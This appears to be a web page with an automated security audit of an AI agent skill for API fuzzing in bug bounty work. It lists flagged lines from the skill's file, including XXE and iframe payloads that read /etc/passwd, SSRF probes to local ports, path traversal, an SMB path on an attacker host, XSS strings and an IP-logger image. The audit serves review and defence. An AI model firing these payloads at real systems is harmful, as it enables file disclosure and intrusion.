API Fuzzing for Bug Bounty

Provides techniques for testing API security, identifying vulnerabilities, and conducting penetration testing during bug bounty engagements.

Security score: 53/100

The API Fuzzing for Bug Bounty skill was audited on Feb 21, 2026 and we found 15 security issues across 3 threat categories, including 2 high-severity. Review the findings below before installing.

Security Issues

medium line 418

Curl to non-GitHub URL

Source: SKILL.md
418: curl -X POST https://target.com/graphql \
high line 139

Access to /etc/passwd

Source: SKILL.md
139: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
high line 296

Access to /etc/passwd

Source: SKILL.md
296: <iframe src="file:///etc/passwd" height=1000 width=800>
low line 58

External URL reference

Source: SKILL.md
58: kr scan https://target.com -w routes-large.kite
low line 145

External URL reference

Source: SKILL.md
145: <object data="http://127.0.0.1:8443"/>
low line 146

External URL reference

Source: SKILL.md
146: <img src="http://127.0.0.1:445"/>
low line 154

External URL reference

Source: SKILL.md
154: https://example.org/download?filename=a.png
low line 155

External URL reference

Source: SKILL.md
155: https://example.org/download?filename=C:\inetpub\wwwroot\web.config
low line 156

External URL reference

Source: SKILL.md
156: https://example.org/download?filename=\\smb.dns.attacker.com\a.png
low line 250

External URL reference

Source: SKILL.md
250: http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}
low line 253

External URL reference

Source: SKILL.md
253: http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
low line 299

External URL reference

Source: SKILL.md
299: <object data="http://127.0.0.1:8443"/>
low line 302

External URL reference

Source: SKILL.md
302: <img src="http://127.0.0.1:445"/>
low line 305

External URL reference

Source: SKILL.md
305: <img src="https://iplogger.com/yourcode.gif"/>
low line 418

External URL reference

Source: SKILL.md
418: curl -X POST https://target.com/graphql \
Scanned on Feb 21, 2026